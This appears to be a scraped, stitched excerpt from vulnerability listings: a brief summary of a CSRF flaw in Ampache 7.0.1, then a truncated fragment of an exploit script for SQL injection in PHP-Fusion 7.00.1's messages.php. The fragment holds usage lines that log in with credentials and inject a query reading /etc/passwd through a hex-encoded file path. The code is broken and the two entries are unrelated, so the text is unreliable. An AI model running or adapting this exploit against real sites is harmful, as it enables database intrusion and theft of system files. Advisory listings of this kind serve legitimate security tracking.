Ampache 跨站请求伪造漏洞

Ampache is an open source web-based audio/video application and file manager from Ampache. A cross-site request forgery vulnerability exists in Ampache version 7.0.1, which stems from the current token parsing implementation not adequately validating CSRF tokens when a user deletes a message...

PHP-Fusion 7.00.1 - 'messages.php' SQL Injection

\n" . " php $argv0 localhost /php-fusion/ user s3cret "SELECT database"\n". " php $argv0 localhost / user s3cret "SELECT loadfile0x2F6574632F706173737764"\n\n"; die; echo "Logging into system..."; //login to php-fusion using login and pass $logindata = send$host, array "path" =...